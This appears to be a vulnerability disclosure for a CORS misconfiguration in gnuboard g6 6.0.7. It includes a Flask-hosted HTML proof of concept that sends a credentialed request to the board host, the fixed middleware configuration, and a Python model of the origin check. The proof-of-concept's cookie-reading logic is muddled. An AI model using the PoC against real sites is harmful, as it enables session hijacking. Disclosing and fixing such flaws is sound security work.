Version: 6.0.7
Vuln: CORS Misconfiguration
PoC
# Minimal server that serves the PoC page (index.html below) on port 8800
from flask import Flask, jsonify, send_from_directory

app = Flask(__name__)


@app.route('/')
def serve_html():
    return send_from_directory('', 'index.html')


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8800)
<html>
<body>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      var cookies = document.cookie;
      document.getElementById("demo").innerText = "Cookies: " + cookies;
      alert("Cookies: " + cookies);
    }
  };
  xhr.open("GET", "http://<gnuboardHost>", true);
  xhr.withCredentials = true;
  xhr.send();
}
</script>
</body>
</html>
Impact
Session hijacking is possible just by getting a user to open the link.
Secure Code (core/middleware)
In a production environment (as opposed to a test setup), the host must be specified explicitly in allow_origins, as shown here:
app.add_middleware(
    CORSMiddleware,
    allow_origins=["http://<gnuboardHost>"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)
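To see why a wildcard origin list combined with allow_credentials leaks the session while the fixed configuration does not, here is an added example (not code from this report or from gnuboard) that models in plain Python the origin decision Starlette's CORSMiddleware makes for a simple request; the wildcard as the assumed original value, the host names and the cookie value are all placeholders or constructed.

```python
from dataclasses import dataclass, field

# Assumed model of CORSMiddleware's origin decision for a simple (non-preflight)
# response; a re-implementation for illustration, not the middleware's own code.

@dataclass
class CorsConfig:
    allow_origins: list = field(default_factory=list)
    allow_credentials: bool = False


def is_misconfigured(cfg):
    """Wildcard origins plus credentials is the combination the report describes."""
    return "*" in cfg.allow_origins and cfg.allow_credentials


def cors_response_headers(cfg, request_headers):
    """CORS headers added to the response for the given (lower-cased) request headers."""
    origin = request_headers.get("origin")
    if origin is None:
        return {}  # same-origin or non-browser request: nothing to add
    headers = {}
    allow_all = "*" in cfg.allow_origins
    has_cookie = "cookie" in request_headers
    if allow_all and not has_cookie:
        headers["access-control-allow-origin"] = "*"
    elif allow_all:
        # '*' may not be combined with credentials, so the request's own
        # Origin is reflected back: any site becomes an allowed origin.
        headers["access-control-allow-origin"] = origin
    elif origin in cfg.allow_origins:
        headers["access-control-allow-origin"] = origin
    else:
        return {}  # origin not in the allow list: the browser blocks the read
    if cfg.allow_credentials:
        headers["access-control-allow-credentials"] = "true"
    return headers


def credentialed_read_allowed(cfg, request_headers):
    """True when a page at the request's Origin may read a response sent with cookies."""
    h = cors_response_headers(cfg, request_headers)
    origin = request_headers.get("origin")
    # Browsers reject '*' when credentials are included; only an exact match counts.
    return (h.get("access-control-allow-origin") == origin
            and h.get("access-control-allow-credentials") == "true")


# Constructed sample: a logged-in victim's browser loads the PoC page, and the
# XHR with withCredentials=true attaches the board's session cookie.
ATTACKER_REQUEST = {"origin": "http://attacker.example", "cookie": "session=CONSTRUCTED"}
WEAK = CorsConfig(allow_origins=["*"], allow_credentials=True)
FIXED = CorsConfig(allow_origins=["http://<gnuboardHost>"], allow_credentials=True)
```

Running `credentialed_read_allowed(WEAK, ATTACKER_REQUEST)` returns True and the same call with `FIXED` returns False, which is the whole difference the middleware change makes.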
Video
video.mp4
ref: b9b6bb7
https://github.com/gnuboard/g6/blob/master/core/middleware.py#L81